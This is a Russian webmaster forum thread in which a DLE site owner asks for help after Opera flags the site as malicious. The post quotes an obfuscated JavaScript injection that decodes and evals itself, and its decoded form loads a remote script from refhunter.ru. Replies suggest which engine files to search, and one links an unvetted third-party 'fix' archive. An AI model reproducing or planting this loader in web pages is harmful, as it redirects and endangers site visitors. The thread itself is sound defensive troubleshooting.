Обнаружено вредоносное ПО
Страницы: 1 2 След.
Обнаружено вредоносное ПО
Здравствуйте, появилась такая проблема.
Если зайти на сайт raplist.ru через обозреватель Opera, то выходит сразу сообщение "Обнаружено вредоносное ПО" и что сайт подозревается в мошенничестве.

Смотрим исходный код страницы. В самом верху до надписи "<!DOCTYPE html PUBLIC " есть следующее
Код
<!-- Obfuscated by MyObfuscator PRO v2.03 www.myobfuscate.com -->
<sc ript language="javascript" type="text/javascript">var OO1='7kyJ+QHcpdyKnI3Yz9CP+ICO4kjM4ETPkl2PwhGcuMnavQHcpJ3Yz9Sdy5iclRnb1hmZlJ3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var IIO=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function _0lI(O10){var lOI=IIO[0];var _1l0,I0I,_11O,O0l,_1O1,I10,_1IO,lIO,_1OO=0,_0IO=IIO[1];do{O0l=lOI[IIO[3]](O10[IIO[2]](_1OO++));_1O1=lOI[IIO[3]](O10[IIO[2]](_1OO++));I10=lOI[IIO[3]](O10[IIO[2]](_1OO++));_1IO=lOI[IIO[3]](O10[IIO[2]](_1OO++));lIO=O0l<<18|_1O1<<12|I10<<6|_1IO;_1l0=lIO>>16&0xff;I0I=lIO>>8&0xff;_11O=lIO&0xff;if(I10==64){_0IO+=String[IIO[4]](_1l0);}else{if(_1IO==64){_0IO+=String[IIO[4]](_1l0,I0I);}else{_0IO+=String[IIO[4]](_1l0,I0I,_11O);};};} while(_1OO<O10[IIO[5]]);return _0IO;};function lI1(l10){var III=IIO[1],_1OO=0;for(_1OO=l10[IIO[5]]-1;_1OO>=0;_1OO--){III+=l10[IIO[2]](_1OO);};return III;};eval(_0lI(lI1(OO1)));</script>


Не один антивирус не ругается (за исключением встроенного в оперу AVG) И в гугле и в яндеске не написано, что есть вредоносный код.
Но заметил такую вещь, этот код влияет на стиль сайта. Если убрать его в Исходном коде и применить изменения, текст становится таким каким должен был быть изначально. И ещё раз в сутки с 1 IP если нажать на ссылку не кнопкой мыши а, колёсиком, чтобы открыло в новой вкладке страницу, то страницу выбрасывает на чей то сайт (сайты меняются).

в main.tpl чужих кодов нет. Ставил даже очень старый свой main.tpl чтобы проверить, но от него не зависит, так же не зависит от .htaccess.

Не знаю куда обращаться, и не уверен сталкивался ли бы кто-нибудь с этим. Потому что сам впервые наткнулся на такое предупреждение.

Рекламы на сайте нет и не было в этот период.

Пожалуйста помогите.
Я так понимаю, обычный script просто зашифровали через сервис www.myobfuscate.com
Но где и как мне его искать?
смог всё таки расшифровать это байду, вот что выдало:
Код
<sc ript language="JavaScript" src="http://refhunter.ru/script/js.php?id=182988"></script>


Может кто скажет куда такое могли засунуть?
какой движок? попробуйте поискать в index.php
скачайте все файлы на комп и в totalComander поиском найти куски кода
Цитата
daden11 пишет:
какой движок? попробуйте поискать в index.php


Движок DLE 9.3. В index.php нету.
Смотри в папке engine файл engine.php над коментом Формирование speedbar
А может эта ваша партнерка...
ищите инклюд в index.php или main.tpl(не сам код а путь к файлу с ним)
А лучше покажите начала этих файлов тут.
Изменено: Lazun429 - 31 Мая 2011 16:56
Скорее уже в базе. Пробуй фикс: _http://php-yuri.ru/fix.rar
Цитата
Олег пишет:
А может эта ваша партнерка...


исключено.

Цитата
abyss-by пишет:
Скорее уже в базе. Пробуй фикс: _http://php-yuri.ru/fix.rar


Результат: 9075/9074.
Удалено вредоносного кода: 153
Но проблема не решена.

Цитата
Олег пишет:
Смотри в папке engine файл engine.php над коментом Формирование speedbar


спасибо, удалил там какую-то рекламную ссылку, но всё равно это ещё не то что нужно.

Цитата
Lazun429 пишет:
ищите инклюд в index.php или main.tpl(не сам код а путь к файлу с ним)
А лучше покажите начала этих файлов тут.


ничего там не нашел левого smile:(
менял шаблон, проблема не решается, значит к файлам шаба это не относится, дело в самом движке. Скажите где можно ещё поковыряться?
Путь: engine - classes - mysql.php
Скорее всего там.
Цитата
leon_need пишет:
Путь: engine - classes - mysql.php
Скорее всего там.


нету ничего, даже заменял всю эту папку оригиналом с чистого двига, всё равно проблема остается.
Может кэш очистить, может уже вылечили, а кэш старый
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
15:06 Влияние ссылок буржнете 
10:53 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 
08:36 Обновления интерфейса яндекс метрики 
18:34 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:13 Рапида умерла. Куда выводить с AdSense? 
15:05 Чем заменили ТИЦ? 
15:01 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950 
15:49 Проверка на индекс в Telegram боте @SpeedyIndexbot 
13:47 HidMark.com - естественные ссылки от 1.5$ Естественные ссылки. Крауд-маркетинг. 
12:05 USMobileSMSBot - 
11:16 4G/LTE Mobile Proxy 30+ geo  
15:34 «Взрываем языковые преграды» – переводим любые тексты 
15:31 Доходные сайты под бурж 
15:06 Вечные ссылки с ТОПОВЫХ ресурсов! Размещение вечных трастовых ссылок с тИЦ от + 1000 до +45000 
13:45 В России снизили беспошлинный порог для онлайн-покупок 
13:30 Тренды заработка 2024-2025 
13:12 Суд постановил заблокировать Telegram 
11:10 150+ хакерских поисковых систем и инструментов 
02:58 Точные прогнозы на футбол 
22:05 Курс доллара упал ниже 85 рублей 
19:31 Таксистам из "Яндекс Go" стало очень выгодно занижать рейтинг всем пассажирам